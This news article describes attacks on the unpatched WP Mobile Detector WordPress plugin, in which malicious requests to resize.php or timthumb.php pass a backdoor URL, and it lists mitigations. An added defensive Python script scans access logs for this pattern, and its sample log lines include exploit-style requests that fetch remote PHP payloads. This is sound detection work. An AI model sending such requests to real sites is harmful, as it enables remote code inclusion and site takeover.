WordPress plugin with 10,000+ installations being exploited in the wild

Posted on Jun 17 2016 - 5:40am by lepocha

A growing number of WordPress websites have been infected by attackers exploiting a vulnerability that remains unpatched in a widely used plugin known as WP Mobile Detector, security researchers warned.

The attacks have been under way since last Friday and are mainly being used to install porn-related spamming scripts, according to a blog post published Thursday. The underlying vulnerability in WP Mobile Detector came to light on Tuesday in this post. The plugin has since been removed from the official WordPress plugin directory. As of Wednesday, the plugin reportedly had more than 10,000 active installations, and it appears many remained active at the time this post was being prepared.

The security flaw stems from the plugin's failure to filter malicious input submitted by website visitors. Because WP Mobile Detector performs no security checks, an attacker can feed malicious PHP code into requests received by websites that use the plugin.

"The vulnerability is very easy to exploit," Sucuri security analyst Douglas Santos wrote. "All the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL."

With no update available, the most practical course of action for vulnerable websites is to uninstall WP Mobile Detector completely. A partial fix involves disabling PHP execution in the plugin's subdirectory, but that measure does not stop attackers from uploading malicious files to that directory and linking to them elsewhere online. Website administrators may also revoke write permissions altogether in the subdirectory, but that can prevent the plugin from working. Most application-level firewalls do not provide meaningful protection against the exploits either, although Sucuri said its firewall service does offer a patch using a virtual hardening engine. The vulnerability can be exploited only when the PHP option allow_url_fopen is enabled.
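A defender's detection pass over web-server access logs, added here as an example and not code from Sucuri or the article: it flags requests to resize.php or timthumb.php inside any plugin directory whose query string carries a remote URL, the pattern the exploit described above relies on. The plugin directory name, the query parameter name and the log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache combined format). The plugin
# slug "wp-mobile-detector" and the "src" parameter are assumptions.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jun/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.7/b.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Jun/2016:10:13:22 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=https%3A%2F%2F198.51.100.7%2Fx.php HTTP/1.1" 200 512 "-" "curl/7.47"
198.51.100.20 - - [03/Jun/2016:10:14:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.4 - - [03/Jun/2016:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Parse the client IP, request target and status code out of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The two scripts named in the article, under any plugin directory.
PLUGIN_SCRIPT_RE = re.compile(
    r'^/wp-content/plugins/[^/]+/(resize|timthumb)\.php$', re.IGNORECASE
)
# A value that points off-site: an absolute http(s) URL or a scheme-relative one.
REMOTE_RE = re.compile(r'^(https?:)?//', re.IGNORECASE)


def is_remote_fetch(target):
    """True if the request hits resize.php/timthumb.php in a plugin directory
    and any query parameter (whatever its name) carries a remote URL."""
    parts = urlsplit(target)
    if not PLUGIN_SCRIPT_RE.match(parts.path):
        return False
    # parse_qsl percent-decodes values, so an encoded https%3A%2F%2F is caught too.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_RE.match(value.strip()):
            return True
    return False


def find_suspicious(log_text):
    """Return (ip, status, target) for every log line matching the exploit pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_remote_fetch(m['target']):
            hits.append((m['ip'], m['status'], m['target']))
    return hits


if __name__ == '__main__':
    for ip, status, target in find_suspicious(SAMPLE_LOG):
        print(f'{ip} {status} {target}')
```

A 200 on such a request is the stronger signal, since with allow_url_fopen enabled the fetch succeeded; a local relative path like images/logo.png is ordinary plugin traffic and is not flagged.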

If the exploit's invocation of resize.php sounds familiar, it may be because of the recent vulnerability found in ImageMagick, a widely used image-processing library that many websites use directly or indirectly to resize images uploaded by end users. But Sucuri CTO Daniel Cid told Ars that there is no connection between the two vulnerabilities.